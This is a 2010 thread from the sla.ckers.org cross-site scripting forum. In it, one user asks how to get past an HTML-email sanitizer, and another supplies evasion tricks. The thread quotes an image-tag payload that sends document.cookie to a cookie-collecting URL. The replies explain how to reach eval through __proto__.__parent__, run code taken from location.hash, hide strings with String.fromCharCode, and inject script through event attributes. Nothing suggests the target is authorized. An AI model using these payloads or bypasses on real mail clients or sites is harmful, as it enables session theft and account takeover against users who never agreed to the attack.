Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
bypassing a filter
Posted by: progre55
Date: March 15, 2010 11:00PM

Hi people.

I have a problem fooling a filter that strips html and removes all vulnerable code.
For instance, if you have this tag:
<img src='http://mysite.com/cookiejar.php?cook='+document.cookie />
the filter puts the extention "defang_" in front the + sign. It also puts it before any element outside the quotes:
for example <img src='http://mysite.com/cookiejar.php?cook=' + document.cookie /> becomes <img src='http://mysite.com/cookiejar.php?cook=' defang_+ defang_document.cookie />

Any suggestions, please?

Options: ReplyQuote
Re: bypassing a filter
Posted by: thornmaker
Date: March 16, 2010 10:40AM

eval is your friend

Options: ReplyQuote
Re: bypassing a filter
Posted by: progre55
Date: March 16, 2010 02:42PM

well, it's actually an html-email, and they filter out all the script tags (and its alterations) and eval is replaced with evalalert and they have an empty function for it.

Anyways, any good readings on html-email hacks? =)

Options: ReplyQuote
Re: bypassing a filter
Posted by: thornmaker
Date: March 16, 2010 03:16PM

it can be bypassed but without seeing the details, it's like shooting in the dark.

try using one of these http://sla.ckers.org/forum/read.php?24,28641 to get a reference to window e.g. __proto__.__parent__ . then you can do something like __proto__.__parent__['eval'](location.hash.slice(1)). If single quotes still cause problems, you can probably get around that using something like String.fromCharCode(101,118,97,108) . If the location object is messed with, then you can put location.hash.slice(1) in quotes too (or use fromCharCode) and eval it twice.

[edit:] your first exmaple uses an image tag with '+document.cookie so I assume you already have a way of injecting JS (escaping out of a html attribute or whatever). if not, you had best figure out that one first. remember, there are a lot of ways to inject JS that don't involve script tags.



Edited 1 time(s). Last edit at 03/16/2010 03:22PM by thornmaker.

Options: ReplyQuote
Re: bypassing a filter
Posted by: progre55
Date: March 16, 2010 05:51PM

Thanks man, I'll try that all, and get back to you with success.. hopefully :)

Options: ReplyQuote
Re: bypassing a filter
Posted by: progre55
Date: March 16, 2010 06:22PM

btw,
"remember, there are a lot of ways to inject JS that don't involve script tags."

any threads or hints on this, please? :)

edit: well actually, I could use script in attributes like onmouseover, onwhatever, etc :)
but any other ways?



Edited 1 time(s). Last edit at 03/16/2010 06:38PM by progre55.

Options: ReplyQuote


Sorry, only registered users may post in this forum.